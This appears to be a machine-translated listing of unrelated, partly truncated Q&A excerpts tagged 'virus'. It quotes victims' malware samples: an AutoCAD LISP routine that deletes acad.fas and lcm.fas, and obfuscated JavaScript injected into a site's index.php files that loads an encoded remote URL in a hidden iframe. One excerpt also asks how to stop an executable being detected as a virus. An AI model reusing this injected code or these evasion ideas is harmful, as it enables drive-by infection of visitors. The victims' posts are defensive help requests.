标签: virus

我的公司遭到了AutoCAD病毒的攻击,该病毒正在删除并替换我们acaddoc.lsp的例程.

我是一名建筑师,并不完全确定重复的"查找"和"删除"是做什么的.

问题

1. 什么是用(目前正在搜索acadapq)替换文件？
2. 谁为AutoCAD编写病毒？!？!

谁看过这个吗？CAD论坛不是很有帮助.

(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.fas")
      (if (vl-file-delete (findfile "acad.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "lcm.fas")
      (if (vl-file-delete (findfile "lcm.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0) …

如何将系统连接到网络并嗅探病毒/间谍软件相关的流量？我想插上一根网线,启动一个合适的工具沙,让它扫描数据是否有任何问题迹象.我不希望这会找到所有内容,这不是为了防止初始感染,而是帮助确定是否有任何东西试图主动感染其他系统/导致网络问题.

运行常规网络嗅探器并手动查看结果是没有用的,除非流量非常明显,但我找不到任何工具来自动扫描网络数据流.

我有一个exe使用 PyInstaller 生成的文件的 AntiVirus 误报问题，通过搜索，我发现这个答案包含重新编译引导加载程序，但我无法完成。这是我到目前为止尝试过的：

1. 由于某些原因安装失败，尝试使用“choco install -y vcbuildtools”安装带有choco的C++构建工具。
2. 从这里安装visual studio社区然后转到“cd bootloader”并python ./waf distclean all得到错误can't open file './waf': [Errno 2] No such file or directory
3. 安装 MinGW-w64 并设置路径然后重试，我遇到了同样的错误。

或者也许有另一种方法可以使可执行文件不被检测为病毒/木马。

使用的软件包：PyQt5、pysnmp、pandas、numpy。

编辑： 感谢@Ana Knickerbocker 的回答，我能够取得进展，现在当我运行时python ./waf all出现错误： Python Version : 3.7.0 (v3.7.0:1bf9cc5093, Jun 27 2018, 04:06:47) [MSC v.1914 32 bit (Intel)] Checking for 'msvc' (C compiler) : not found Checking for 'gcc' (C compiler) : not found Checking for 'clang' …

EICAR测试病毒用于测试反病毒程序的功能.为了将其检测为病毒,

防病毒程序是否应具有测试病毒的病毒定义

要么

启发式检测将其检测为可疑模式并将其检测为病毒.

(我已经看到AV程序在下载时删除文件但没有将病毒识别为EICAR测试病毒的情况.就像一个可疑对象 - >即如果它有定义它应该识别病毒名称,详细信息等Isn'是吗？)

意识到!创建间谍软件,计算机病毒和类似的恶意软件在您居住的地方可能是非法的,几乎每个人都被认为是非常不道德的.尽管如此,我还是要问这一点,以提高人们对创建它的难易程度的认识.在W32/Induc-A被一个想出一种传播方式的人引入这个世界之后,我问这个问题.所以我想知道如何创建病毒,以便将来能够识别它们!

最近发现了一种新的病毒,它通过替换开发人员的库代码副本来传播自己.实际上,通过Delphi 4到7的源代码.发生的事情是,在野外有一种病毒,它在计算机中搜索一个名为SYSCONST.PAS的文件,它将自己添加为源代码.该文件恰好是Delphi运行时库的源文件.(这个运行时源代码可供Delphi开发人员使用.)因此,在被感染后,程序员会在不知情的情况下创建大量新版本的病毒.由于病毒扫描程序有时会产生误报,因此许多开发人员可能因此决定忽略扫描程序的警告,甚至可能在构建项目时禁用扫描程序.更糟糕的是,他们的项目甚至可能会触发客户的扫描程序,因此这些程序员可能不会检查他们的源代码,而只是试图以某种方式欺骗扫描程序.也就是说,如果病毒扫描程序甚至能够识别病毒,那不太可能.因此,我们的软件开发人员可能会在没有意识到我们正在做的事情的情

那么,如何创建病毒呢？简单:让你的源代码被病毒感染,你就完成了!

好的,所以Delphi 4到7的源代码可能会被感染.所有Delphi开发人员,请检查您的源文件!案例只是一个概念验证,显然它可以非常成功.此外,大多数病毒扫描程序不会检查源代码,只关注可执行文件.这种病毒可能会在相当长一段时间内未被发现.

这种病毒也很成功,因为它滥用了源代码.Delphi是一个商业项目,源代码可用.但谁能确定这些黑客不会以类似的方式攻击开源项目？那里有很多开源项目,谁会检查它们,确保它们都以一种体面的方式运行？如果有人正在检查代码,他是否能够识别是否有恶意代码？

因此,为了确保我们能够识别恶意源代码,我不得不问:我如何创建病毒？如何识别会产生病毒的代码？大多数恶意软件想要做什么？

我遇到了一些非常奇怪的事情,事情就是不加起来.首先,我在这里发布了这个,因为我不确定这是否与计算机病毒有任何关系.如果确实如此,请你指点我到一个寻求帮助的地方？

所以现在:

我在这里有一些奇怪的问题,我的反病毒和恶意软件标记代码*用masm和masm示例编译为病毒.我用谷歌搜索,发现这个问题已经发生过,所以我没有太认真对待这个问题,起初认为这是假阳性.

但是我编译了你在这篇文章底部看到的代码来测试我的其他一些东西.我通过ollydbg运行它(同时忽略了我的comodo反病毒)然后我看到了这个:

00401000 >  -E9 FBEF6F71    JMP 71B00000  ; this is a weird jump I did not put there
00401005     90             NOP
00401006     8BC0           MOV EAX,EAX
00401008   . 8BD8           MOV EBX,EAX
0040100A   . 33D9           XOR EBX,ECX
0040100C   . 8BC3           MOV EAX,EBX
0040100E   . 03CB           ADD ECX,EBX
00401010   . 33C3           XOR EAX,EBX
00401012   . 2BC1           SUB EAX,ECX
00401014   . 8BCB           MOV ECX,EBX
00401016   . 33D9           XOR EBX,ECX

下面的代码不可能编译成跳转,所以我正在踩到代码.过了一会儿,我看到奇怪的代码开始通过ntdll.dll库中的api进行枚举.发生了什么？如果这确实是病毒在哪里得到帮助？

但我仍然不确定,comodo和malwarebytes都只将示例标记为病毒,而不将文件(test.exe)标记为病毒

我用来测试的测试代码......

*:include\masm32\include\masm32rt.inc

.data

.code

Start:

nop
nop
nop
nop
nop …

关于programmers.se的一个问题让我想知道:有没有人发布过开源病毒？当然,我只是想知道病毒的源代码可能是什么样的好奇心.快速谷歌搜索显示有大量的开源防病毒程序,但我没有看到任何开源病毒.

我收到了两个不同的Microsoft Word文档,我的病毒扫描程序警告我包含宏.这些应该是简单的文本文件,发送它们的人甚至不知道宏是什么; 他们可能是个错误,但他们可能是恶意感染的迹象.我的OpenOffice.org安装设置根本不加载宏,因为我很少使用它,所以我不关心我的系统的安全性.我希望能够做的是找出那些宏所做的事情,而不会让我的系统暴露于这些宏的任何恶意意图,以便告诉向我发送文件的人是否传播感染.

我的网站被木马脚本感染了.

有人设法创建/上传名为"x76x09.php"或"config.php"的文件到我的网站空间的根目录.其大小为44287字节,其MD5校验和为8dd76fc074b717fccfa30b86956992f8.我用Virustotal分析了这个文件.这些结果表明它是"Backdoor/PHP.C99Shell"或"Trojan.Script.224490".

此文件已在创建时执行.所以它必须自动发生.此文件将以下恶意代码添加到我的网站空间上的每个index.php的末尾.

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

在我的页面上显示该代码后,用户报告在Firefox中弹出一个蓝色面板.它要求他们安装一个插件.现在他们中的一些人在他们的PC上有Exploit.Java.CVE-2010-0886.a.

虽然我关闭了allow_url_fopen和allow_url_include,但确实发生了感染.我的主人说这个文件没有通过FTP上传.

所以我的问题是:

• 恶意代码有什么作用？它是如何编码的？
• 远程文件("x76x09.php"或"config.php")如何进入我的网站空间？SQL注入？病毒在我自己的电脑上？
• 如何在将来保护我的网站免受此类攻击？

非常感谢你提前!我真的需要帮助.

这个问题很相似.但它更像是一份报告.我从一开始就不知道它是病毒.所以这里的问题是指病毒本身,另一个问题不是.

我一进入网站,我的浏览器(chrome)就下载了这个脚本.它没有混淆,也没有太久,我认为它是无害的,但我不知道PHP,所以我不确定.该文件被调用csync.php.

Chrome使它看起来像是唯一下载的文件.有可能这不是真的吗？

有人能说清楚这是做什么的吗？

<?php
require_once("config/config.php");

require_function("util/StaticFunctions.php");
require_function("service/ServiceFactory.php");
require_function("bo/BoFactory.php");
require_function("data/DataFactory.php");
require_function("util/UtilFactory.php");
require_function("data/AkamaiLoggingService.php");

include 'config/setup/config-setup-skenzo.php';
include 'config/skenzo_request_variables.php';

header('P3P:CP="NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA"');
header('Content-type: text/html');
header('Cache-Control: no-cache, no-store, must-revalidate');
header('Pragma: no-cache');
header('Expires: -1');

$visitorInfo = BoFactory::getVisitorInfo();
$vsid = $visitorInfo->getVisitorId();
$dataNames = VisitorInfo::$VSID_DATA_NAMES;
$mName = BoFactory::getInboundHttpRequest()->getSanitizedValueOfParam('type');
$mValue = BoFactory::getInboundHttpRequest()->getSanitizedValueOfParam('ovsid');



$vsCk = VISITOR_ID;
$vsDaCk = VISITOR_DATA;
$sepVal = VisitorInfo::$VALUE_SEP;
$sepTime = VisitorInfo::$TIME_SEP;
$vsDaTime = VisitorInfo::$VSID_DATA_TIME;

echo '<html> <head></head> <body> …